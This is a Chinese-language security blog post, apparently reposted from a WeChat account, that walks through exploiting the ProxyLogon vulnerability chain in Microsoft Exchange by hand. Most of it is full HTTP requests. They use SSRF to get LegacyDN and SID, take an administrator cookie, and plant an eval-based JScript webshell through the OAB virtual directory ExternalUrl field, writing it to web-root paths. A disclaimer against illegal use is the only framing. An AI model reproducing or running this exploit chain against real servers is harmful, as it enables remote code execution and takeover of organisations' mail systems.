看了觉得好点个关注咯,欢迎各位师傅加群交流。
勿要非法渗透,造成影响与本人无关!
勿要非法渗透,造成影响与本人无关!
漏洞介绍:
CVE-2021-26855漏洞又称为ProxyLogon,攻击者可以利用ssrf绕过权限验证,再结合同期Exchange的其他漏洞例如文件写入(CVE-2021-27065)等漏洞进行组合RCE。
影响版本:
Exchange Server 2019 < 15.02.0792.010
Exchange Server 2019 < 15.02.0721.013
Exchange Server 2016 < 15.01.2106.013
Exchange Server 2013 < 15.00.1497.012
POC:
响应包头部包含X-CalculatedBETarget、X-FEServer两个字段,表示存在漏洞。
GET /ecp/fd45e2.png HTTP/1.1
Host: xx.xxx
Cookie: X-BEResource=localhost~1942062522;
漏洞复现:
1、获取LegacyDN。
下面这两种方式可以获取目标的域名,还有其它的。
(1)这个POC也可获取域名:
https://domain/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%3[email protected]
(2)
ProxyShell第一步这种方式也可以获取LegacyDN
YongYe安全,公众号:YongYe 安全实验室ProxyShell__详细手工复现,CVE组合攻击ExChange_GetShell。全网最详细复现!
知道域名,获取LegacyDN。还有其它方式获取LegacyDN。
POST /ecp/333.js HTTP/1.1
Cookie: X-BEResource=域名.local/autodiscover/autodiscover.xml?a=~1942062522;
Content-Type: text/xml
Content-Length: 377
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>[email protected]</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
下面这个响应码在整个流程中表示域名存在问题,检查域名。
HTTP/2 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Request-Id: 63726196-d769-487e-b447-c7
X-Calculatedbetarget: rexxx.local
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Feserver: VS3
Date: Thu, 15 Jun 2023 02:36:01 GMT
Content-Length: 88
NegotiateSecurityContext failed with for host 'rexxxx.local' with status 'TargetUnknown'
Tips:/ecp/后面随便写都可以,获取不了可换一种方式获取LegacyDN不必死磕。
2、获取SID
POST /ecp/333.js HTTP/2
Cookie: X-BEResource=administrator@域名:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
Content-Type: application/mapi-http
X-Requesttype: Connect
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:2
Content-Length: 147
legacyDnx00x00x00x00x00xe4x04x00x00x09x04x00x00x09x04x00x00x00x00x00x00
Tips:
(1)注意COOKIE内的端口444,不加获取不了。
(2)Data数据看不懂怎么提交的去看Proxyshell那篇。
3、获取Cookie
POST /ecp/333.js HTTP/2
Host:
Cookie: [email protected]:444/ecp/proxyLogon.ecp?a=~1942062522;
Content-Type: text/xml
Msexchlogonmailbox: S-1-5-20
Content-Length: 93
<r at="NTLM" ln="Administrator"><s t="0">SID</s></r>
4、写入Shell,分为三步。
(1)通过DDI组件Getlist接口获取RawIdentity(GetObject接口有时候返回NULL)
这里参考了G3et师傅这篇文章
G3et,公众号:Hack PartyExchange Proxylogon漏洞复现||附批量扫描POC
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbttmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=8ae71da5-f5-ab9-bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-a2VU41ITRbt5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.
Content-Type: application/json;
Msexchlogonmailbox: S-1-5-20
Content-Length: 247
{"filter": {
"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}}
Tips:响应码500、411需要自已研究一下,这里没有深入了解。
(2)利用外部URL虚拟路径属性引入WebShell。
ExternalUrl字段为Shell。
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=administrator@XXXX:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=tQInySwhZ0-Jg2pk-I-NvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.&a=~1942062522; ASP.NET_SessionId=e71da5-f5-b9-b3bf-5a5c822e3c96; msExchEcpCanary=tQInySwhZ0-Jg2pk-I-sINiqzvPqeCJS5pVtmRNRJjxpBKw1pOyT_sPDikSeu50Q.
Content-Type: application/json;
Msexchlogonmailbox: S-1-5-20
Content-Length: 481
{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "670ab7cf-e053-4baa-9182-e5f"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://ffff/#<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["PASSWORD"],"unsafe");}</script> "
}
}
}
(3)触发重置时的备份功能,将文件写入指定的UNC目录。
这几个路径都可以写。
127.0.0.1c$inetpubwwwrootaspnet_client1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrent1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentscripts1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentscriptspremium1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentthemes1.aspx
127.0.0.1c$Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauthCurrentthemesresources1.aspx
POST /ecp/333.js HTTP/2
Host:
Cookie: X-BEResource=Administrator@xxxxx:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.&a=~1942062522; ASP.NET_SessionId=12d39774-f175-48cd-8a49-e5a077a1763b; msExchEcpCanary=MYU5tQGg_Uy9sNsEvjDxaif2q77cbtsINjWbeLtVJFrNVJ0IXoxcaBVSN6mJgLZSU8LWmSAYOqc.
Content-Type: application/json; charset=utf-8
Msexchlogonmailbox: S-1-5-21
Content-Length: 330
{"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": "25b3d2be-6a28-44d8-acd8-6e2"}, "properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\usacd.txt"}}}
Tips:
1、WebShell的内容需要规避会被URL编码的特殊字符,且字符长度不能超过255
2、实际利用目标环境问题导致失败比较多。
原理这篇文章分析的很详细,可参考排错:https://hosch3n.github.io/2021/08/22/ProxyLogon%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
漏洞复盘:
1、 通过SSRF获取LegacyDN、SID
2、然后通过SID,获取cookie
4、通过cookie,对OABVirtualDirectory对象进行恶意操作,写入shell
原文始发于微信公众号(YongYe 安全实验室):ProxyLogon__手工复现__附POC/EXP,ExChange组合攻击。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论